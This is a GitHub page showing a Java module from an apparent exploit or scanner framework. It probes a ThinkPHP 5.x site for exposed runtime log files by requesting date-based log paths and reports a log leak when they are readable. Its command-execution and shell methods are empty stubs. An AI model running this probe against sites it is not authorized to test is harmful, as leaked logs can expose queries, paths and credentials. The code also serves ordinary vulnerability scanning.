-
Notifications
You must be signed in to change notification settings - Fork 185
Expand file tree
/
Copy pathtp5_log.java
More file actions
executable file
·52 lines (45 loc) · 1.65 KB
/
tp5_log.java
File metadata and controls
executable file
·52 lines (45 loc) · 1.65 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
import java.util.Date;
/**
* Author 莲花 2021/6/27
*/
public class tp5_log implements BasePayload {
@Override
public Result checkVUL(String url) throws Exception {
String CheckStr = "[ info ]";
String CheckErr = "[ error ]";
Date dt = new Date();
String year = String.format("%tY", dt);
String mon = String.format("%tm", dt);
String day = String.format("%td", dt);
ArrayList<String> payload_urls = new ArrayList<String>() {{
add(url + "/runtime/log/" + year + mon + "/" + day + ".log");
add(url + "/runtime/log/" + year + mon + "/" + day + "_cli.log");
add(url + "/runtime/log/" + year + mon + "/" + day + "_error.log");
add(url + "/runtime/log/" + year + mon + "/" + day + "_sql.log");
}};
try {
for (String payload_url : payload_urls) {
String res = HttpRequest.get(payload_url).body();
if (res.contains(CheckStr) || res.contains(CheckErr)) {
return new Result(true, "ThinkPHP 5.x 日志泄露", payload_url);
}
}
} catch (Exception e) {
e.printStackTrace();
}
return new Result(false, "ThinkPHP 5.x 日志泄露", "");
}
@Override
public Result exeVUL(String url, String cmd) throws Exception {
return new Result(false, "", "");
}
@Override
public Result getShell(String url) throws Exception {
return new Result(false, "", "");
}
}